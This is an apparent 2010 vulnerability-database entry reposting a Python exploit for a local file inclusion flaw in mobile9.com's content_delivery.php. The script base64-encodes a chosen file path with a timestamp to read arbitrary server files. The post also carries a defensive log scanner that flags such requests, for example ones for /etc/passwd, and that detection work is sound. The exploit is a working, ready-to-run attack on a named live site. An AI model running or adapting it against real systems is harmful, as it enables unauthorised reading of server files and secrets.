mobile9 local file inclusion vulnerability - vulnerability warning - the black bar safety net

2010-01-29T00:00:00
ID MYHACK58:62201026096
Type myhack58
Reporter Anonymous
Modified 2010-01-29T00:00:00

Description

Because it is base64-encoded, manual testing is very troublesome, so I just wrote a small tool. Experts can skip this.

    import urllib2, sys
    import httplib
    import base64, time

    # Three arguments are used below: hostname, path for the banner check, local file
    if len(sys.argv) <= 3:
        print "=" * 30
        print "mobile9.com local exploit by cnb|rd Qq:441303228"
        print "Email:Linuxrootkit2008@gmail.com"
        print "=" * 30
        print
        print "usage:" + sys.argv[0] + " hostname" + " path" + " local file"
        print
        sys.exit(1)

    host = sys.argv[1]
    path = sys.argv[2]
    file = sys.argv[3]

    # HEAD request to read the Server banner
    h = httplib.HTTP(host)
    h.putrequest("HEAD", path)
    h.putheader("Host", host)
    h.endheaders()
    okresp, reason, headers = h.getreply()
    print "=" * 30
    print host + " Server Banner is " + str(headers.get("Server"))
    print "=" * 30

    print "Local file to read is " + file
    now = int(time.time())
    serverpath = "/download/content_delivery.php?key="
    # The key is URL-safe base64 of "file|timestamp|"
    plain = str(file) + "|" + str(now) + "|"
    print plain
    base64file = base64.urlsafe_b64encode(plain)
    requestpath = serverpath + base64file
    print base64file
    print requestpath
    f = httplib.HTTPConnection(host)
    f.request('GET', requestpath)
    print f.getresponse().read()
    f.close()
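For defenders, the key format the script builds (URL-safe base64 of `file|timestamp|`) can be decoded from web server access logs to spot requests whose file field leaves the content tree. The following Python 3 code is an added example, not part of the original post; the sample log lines, client addresses, function names and the assumption that legitimate keys carry relative paths are all constructed for illustration.

```python
import base64
from urllib.parse import urlsplit, parse_qs

ENDPOINT = "/download/content_delivery.php"  # endpoint path as it appears in the script

def decode_key(key):
    """Decode a key into (file, timestamp); return None if it is malformed."""
    try:
        raw = base64.urlsafe_b64decode(key + "=" * (-len(key) % 4))
        fields = raw.decode("utf-8").split("|")
    except ValueError:  # covers binascii.Error and UnicodeDecodeError
        return None
    if len(fields) < 2 or not fields[1].isdigit():
        return None
    return fields[0], int(fields[1])

def is_suspicious(path):
    """Assumption: legitimate keys hold a relative path with no '..' component."""
    if "\x00" in path or path.startswith(("/", "\\")):
        return True
    return ".." in path.replace("\\", "/").split("/")

def scan(log_lines):
    """Return (client, file) for each request whose decoded key looks like LFI."""
    hits = []
    for line in log_lines:
        try:
            client = line.split(" ", 1)[0]
            target = line.split('"')[1].split(" ")[1]
        except IndexError:
            continue  # not a parseable request line
        url = urlsplit(target)
        if url.path != ENDPOINT:
            continue
        for key in parse_qs(url.query).get("key", []):
            decoded = decode_key(key)
            if decoded and is_suspicious(decoded[0]):
                hits.append((client, decoded[0]))
    return hits

def _key(plain):  # helper used only to build the constructed sample lines
    return base64.urlsafe_b64encode(plain.encode()).decode()

_FMT = '%s - - [29/Jan/2010:10:00:00 +0000] "GET %s HTTP/1.1" 200 512'
SAMPLE_LOG = [  # constructed access-log lines, not real traffic
    _FMT % ("203.0.113.7", ENDPOINT + "?key=" + _key("wallpaper/1234.jpg|1264759200|")),
    _FMT % ("198.51.100.23", ENDPOINT + "?key=" + _key("/etc/passwd|1264759260|")),
    _FMT % ("198.51.100.23", ENDPOINT + "?key=" + _key("../../../../etc/passwd|1264759261|")),
    _FMT % ("203.0.113.7", "/index.php"),
]
```

Running `scan(SAMPLE_LOG)` flags the two requests from 198.51.100.23 and ignores the relative-path download and the unrelated page request.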

CSDN blog cnbird2008